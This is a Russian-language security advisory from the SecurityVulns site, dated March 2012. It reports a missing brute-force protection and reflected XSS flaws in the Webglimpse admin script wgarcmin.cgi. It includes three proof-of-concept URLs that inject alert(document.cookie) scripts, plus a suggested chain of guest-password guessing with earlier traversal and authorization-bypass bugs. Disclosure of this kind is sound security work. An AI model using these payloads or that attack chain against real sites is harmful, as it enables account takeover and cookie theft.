Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Aurora WebOPAC SQL Injection - Security Advisory - SOS-12-004

  Vulnerability Description: XSS-(CROSS SITE SCRIPTING VULNERABILITIES) (ZAPHOD BREEBLEBROX'S BLOCKER A.K.A. ZB BLOCK)

  phpMyVisites 2.4_XSS

  Многочисленные уязвимости в EJBCA

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:19 марта 2012 г.
Subject:Brute Force и XSS уязвимости в Webglimpse

Здравствуйте 3APA3A!


После предыдущих многочисленных Cross-Site Scripting, Full path disclosure, Directory Traversal и Authorization bypass уязвимостей в Webglimpse (SecurityVulns ID: 9436, 9443, 9778, 9876), сообщаю вам о найденных мною новых уязвимостях в Webglimpse. Это Brute Force и Cross-Site Scripting уязвимости. Webglimpse - это local search engine.

Brute Force (WASC-11):

http://site/wgarcmin.cgi

Отсутствие защиты от Brute Force атак может использоваться для получения доступа к админке. Причём можно подобрать логин и пароль к аккаунту гостя (если они не опубликованы публично), что может быть легче, чем к аккаунту админа, а потом использовать ранее упомянутые Directory Traversal и Authorization bypass уязвимости, чтобы получить доступ к аккаунту админа.

XSS (WASC-08):

http://site/wgarcmin.cgi?URL2FIL=URL+2+File+--
%3E&URL=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&NEXTPAGE=T

http://site/wgarcmin.cgi?FIL2URL=%3C--
+File+2+URL&FILE=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&NEXTPAGE=T

http://site/wgarcmin.
cgi?DOMAIN=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&NEXTPAGE=T

Уязвимы Webglimpse 2.18.8 и предыдущие версии. Проверялось в Webglimpse 2.18.7 и 2.18.8, последняя версия 2.20.0 также должна быть уязвима.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3089/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород